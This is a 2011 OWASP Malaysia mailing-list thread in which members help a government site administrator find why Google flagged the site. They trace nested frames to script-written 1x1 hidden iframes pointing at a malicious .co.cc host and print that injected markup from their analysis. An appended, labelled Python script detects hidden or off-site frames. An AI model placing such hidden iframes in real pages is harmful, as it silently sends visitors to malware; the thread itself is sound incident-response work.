Please check how the line got injected into your system. You need to find the source of the problem to make sure it will not happen again.

On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <[email protected]> wrote:
> Mr Adnan thanks for the info and guide..
>
> I have clean all the mess and the site is up and running again..
>
> thanks to all too..
>
> ** I will blog this so others can make it as a guide...
>
> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor <[email protected]> wrote:
>
>> mamp <= LOL typo.. it should be nano
>> js <= one of the binary in Spidermonkey. get the patched version
>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
>> working on MacOS/Darwin, apply this patch
>>
>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
>>
>> thanks
>>
>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan <[email protected]> wrote:
>> > I can see 2 interesting apps/scripts:
>> >
>> > 1. mamp
>> > 2. /opt/analysis/js/js
>> >
>> > care to share? hopefully it is open source ;)
>> >
>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor <[email protected]> wrote:
>> >>
>> >> Here is my bash history:
>> >>
>> >> xanda:tmp adnan$ history
>> >> <snip>
>> >> 500 cd /tmp
>> >> 501 wget http:/www2.pkink.gov.my/indexsedc.php
>> >> 502 wget http://www2.pkink.gov.my/indexsedc.php
>> >> 503 nano indexsedc.php
>> >> 504 wget http://www2.pkink.gov.my/indexsedc.php
>> >> 505 mamp indexsedc.php.1
>> >> 506 nano indexsedc.php.1
>> >> 507 wget http://www2.pkink.gov.my/sedc.php
>> >> 508 nano sedc.php
>> >> 509 wget http://www2.pkink.gov.my/default.php
>> >> 510 nano default.php
>> >> 511 nano default.php
>> >> 512 clear
>> >> <I've remove tags and leave clean JavaScript inside>
>> >> 513 mv default.php default.txt
>> >> 514 /opt/analysis/js/js < default.txt
>> >> 515 cat write.log
>> >> 516 history
>> >> xanda:tmp adnan$
>> >>
>> >> Below is the output of the cat:
>> >> [output]
>> >> xanda:tmp adnan$ cat write.log
>> >> <iframe width="1" height="1"
>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> "></iframe>"<iframe
>> >> width="1" height="1"
>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> "></iframe>"
>> >> [/output]
>> >>
>> >> Hint: you might use modified version of spidermonkey to 'understand'
>> >> the javascript
>> >>
>> >> Thanks
>> >>
>> >> On 8 February 2011 17:38, Mohd Syamsuri <[email protected]> wrote:
>> >> > thanks for the info..
>> >> > i will check all the file.
>> >> >
>> >> > how you found it?
>> >> >
>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor <[email protected]> wrote:
>> >> >>
>> >> >> Here is the flow:
>> >> >>
>> >> >> 1) your indexsedc.php has an iframe to sedc.php
>> >> >> 2) and your sedc.php has an iframe to default.php
>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
>> >> >> actually create an iframe to
>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> >>
>> >> >> thanks :)
>> >> >>
>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <[email protected]> wrote:
>> >> >> > can you point...
>> >> >> > my index.htm or indexsedc.php or other file?
>> >> >> >
>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor <[email protected]> wrote:
>> >> >> >>
>> >> >> >> you have iframe pointed to
>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> >> >>
>> >> >> >> which is not xss :)
>> >> >> >>
>> >> >> >> From my personal point of view, its either caused by:
>> >> >> >> 1) malware on pc which has been used for ftp/access to the server
>> >> >> >> 2) compromised server
>> >> >> >>
>> >> >> >> you can send your access.log to [email protected] or
>> >> >> >> [email protected] for further analysis :)
>> >> >> >>
>> >> >> >> thanks
>> >> >> >>
>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <[email protected]> wrote:
>> >> >> >> > I have check it.
>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <[email protected]> wrote:
>> >> >> >> >>
>> >> >> >> >> Hi Mohd Symsuri,
>> >> >> >> >>
>> >> >> >> >> Why dont you check on the reason why its being blocked, it might
>> >> >> >> >> help.
>> >> >> >> >>
>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>> >> >> >> >>
>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>> >> >> >> >>
>> >> >> >> >> Regards,
>> >> >> >> >> Kishur
>> >> >> >> >>
>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri <[email protected]> wrote:
>> >> >> >> >>>
>> >> >> >> >>> Assalamualikum and Good day for my fellow friends.
>> >> >> >> >>> I need some advice.
>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
>> >> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for almost
>> >> >> >> >>> 4 days.
>> >> >> >> >>> It said that we host malware on our server Malware Detected!
>> >> >> >> >>> ( Google said that!!)
>> >> >> >> >>> What i did is..
>> >> >> >> >>> 1. Scan all the data and upload a new data
>> >> >> >> >>> 2. Check the index.html or index.php
>> >> >> >> >>> 3. Scan using web scanner using
>> >> >> >> >>> http://www.avgthreatlabs.com/
>> >> >> >> >>> http://www.virustotal.com
>> >> >> >> >>> but still get block..
>> >> >> >> >>> Google said Suspected injected code
>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
>> >> >> >> >>> NAME="confcontent"
>> >> >> >> >>> scrolling=yes >
>> >> >> >> >>> I have using this code for almost 2 years
>> >> >> >> >>> What should i do now?
>> >> >> >> >>>
>> >> >> >> >>> --
>> >> >> >> >>> best regard
>> >> >> >> >>> syamsuri
>> >> >> >> >
>> >> >> >> > --
>> >> >> >> > best regard
>> >> >> >> > syamsuri
>> >> >> >
>> >> >> > --
>> >> >> > best regard
>> >> >> > syamsuri
>> >> >
>> >> > --
>> >> > best regard
>> >> > syamsuri
>> >
>> > --
>> > Sharuzzaman Ahmat Raslan
>
> --
> best regard
> syamsuri

--
Sharuzzaman Ahmat Raslan
_______________________________________________
Owasp-Malaysia mailing list
[email protected]
https://lists.owasp.org/mailman/listinfo/owasp-malaysia

OWASP Malaysia Wiki
http://www.owasp.org/index.php/Malaysia

OWASP Malaysia Wiki Facebook
http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
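
Added example, not part of the thread: a small Python check that walks the frame chain described above (frame page, then indexsedc.php, sedc.php, default.php) and reports any frame that is 1 pixel in size or points off-site. The hosts `site.example` and `tracker.invalid`, the page contents and the function names are constructed for illustration. It reads literal markup only, so a frame produced by script has to be recovered first, as was done in the thread with SpiderMonkey.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FrameCollector(HTMLParser):
    """Collect (src, width, height) for every <frame> and <iframe> tag."""
    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("frame", "iframe") and a.get("src"):
            self.frames.append((a["src"].strip(), a.get("width"), a.get("height")))

def is_hidden(width, height):
    """True when either dimension is 0 or 1, as in the write.log output."""
    return any(v is not None and v.strip() in ("0", "1") for v in (width, height))

def trace_frames(pages, start_url, site_host):
    """Follow on-site frames breadth-first; report hidden or off-site ones."""
    findings, seen, queue = [], set(), [start_url]
    while queue:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        collector = FrameCollector()
        collector.feed(pages.get(url, ""))
        for src, width, height in collector.frames:
            target = urljoin(url, src)
            host = urlparse(target).hostname or ""
            offsite = host != site_host and not host.endswith("." + site_host)
            hidden = is_hidden(width, height)
            if offsite or hidden:
                findings.append({"page": url, "target": target,
                                 "offsite": offsite, "hidden": hidden})
            if not offsite:
                queue.append(target)  # keep walking the local chain
    return findings

# Constructed sample: placeholder hosts, file names borrowed from the thread.
# default.php holds the markup its script would write (what write.log showed).
BASE = "http://www2.site.example/"
PAGES = {
    "http://www.site.example/": '<FRAME SRC="' + BASE + 'indexsedc.php" NAME="confcontent">',
    BASE + "indexsedc.php": '<p>news</p><iframe src="sedc.php" width="600"></iframe>',
    BASE + "sedc.php": '<iframe src="default.php" width="600"></iframe>',
    BASE + "default.php": '<iframe width="1" height="1" src="http://tracker.invalid/PLACEHOLDER\n"></iframe>',
}

if __name__ == "__main__":
    for finding in trace_frames(PAGES, "http://www.site.example/", "site.example"):
        print(finding)
```

Each finding names the page that holds the frame, which is the file to compare against a known-good copy and to look for in the access and FTP logs when tracing how the line got there.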

